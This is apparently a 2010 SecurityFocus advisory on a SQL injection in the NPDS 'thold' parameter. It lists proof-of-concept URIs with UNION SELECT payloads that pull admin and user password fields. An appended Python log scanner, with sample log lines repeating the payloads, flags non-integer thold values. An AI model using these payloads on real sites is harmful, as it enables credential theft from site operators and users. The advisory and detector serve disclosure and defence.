NPDS THOLD Parameter SQL Injection Vulnerability

No exploit is required.

The following proof of concept URIs are available:

http://www.example.com/npds/comments.php?thold=0%20UNION%20SELECT%200,0,0,0,0,0,0,0,aid,pwd,0,0%20FROM%20authors

http://www.example.com/npds/comments.php?thold=0%20UNION%20SELECT%200,0,0,0,0,0,0,0,uname,pass,0,0%20FROM%20users

http://www.example.com/npds/pollcomments.php?thold=0%20UNION%20SELECT%200,0,0,0,0,0,0,0,aid,pwd,0,0%20FROM%20authors

http://www.example.com/npds/pollcomments.php?op=results&pollID=2&mode=&order=&thold=0%20UNION%20SELECT%200,0,0,0,0,0,0,0,uname,pass,0,0%20FROM%20u
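
A log check for defenders, added here as an example and not part of the original advisory or of NPDS: it flags requests to the two scripts named in the URIs above whose thold value is not a plain integer. It assumes thold is meant to carry an integer and that the web server writes common/combined-format access logs; the function names and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Scripts named in the advisory's proof-of-concept URIs.
TARGET_SCRIPTS = {"comments.php", "pollcomments.php"}
INT_RE = re.compile(r"-?\d{1,6}")  # assumption: thold is a small integer
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample access-log lines (documentation IP ranges).
SAMPLE_LOG = [
    '192.0.2.10 - - [12/Mar/2010:10:01:02 +0000] "GET /npds/comments.php?thold=0 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [12/Mar/2010:10:01:09 +0000] "GET /npds/comments.php?thold=0%20UNION%20SELECT%200,0,0,0,0,0,0,0,aid,pwd,0,0%20FROM%20authors HTTP/1.1" 200 7344',
    '192.0.2.10 - - [12/Mar/2010:10:02:30 +0000] "GET /npds/pollcomments.php?op=results&pollID=2&mode=&order=&thold=-1 HTTP/1.1" 200 4801',
    '198.51.100.7 - - [12/Mar/2010:10:02:41 +0000] "GET /npds/pollcomments.php?thold=0%20UNION%20SELECT%200,0,0,0,0,0,0,0,aid,pwd,0,0%20FROM%20authors HTTP/1.1" 200 7102',
]


def suspicious_thold(request_target):
    """Return the decoded thold value if it is not a plain integer, else None."""
    parts = urlsplit(request_target)
    script = parts.path.rsplit("/", 1)[-1].lower()
    if script not in TARGET_SCRIPTS:
        return None
    for key, value in parse_qsl(parts.query, keep_blank_values=True):
        v = value.strip()
        # Key is stripped so "thold%20=" is treated the same as "thold=".
        if key.strip().lower() == "thold" and v and not INT_RE.fullmatch(v):
            return v
    return None


def scan(log_lines):
    """Return (line_number, decoded_thold) for every flagged request."""
    hits = []
    for lineno, line in enumerate(log_lines, 1):
        m = REQUEST_RE.search(line)
        value = suspicious_thold(m.group(1)) if m else None
        if value is not None:
            hits.append((lineno, value))
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

The same integer-only rule is what the application itself should enforce on thold before the value reaches a query.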


 

Copyright 2010, SecurityFocus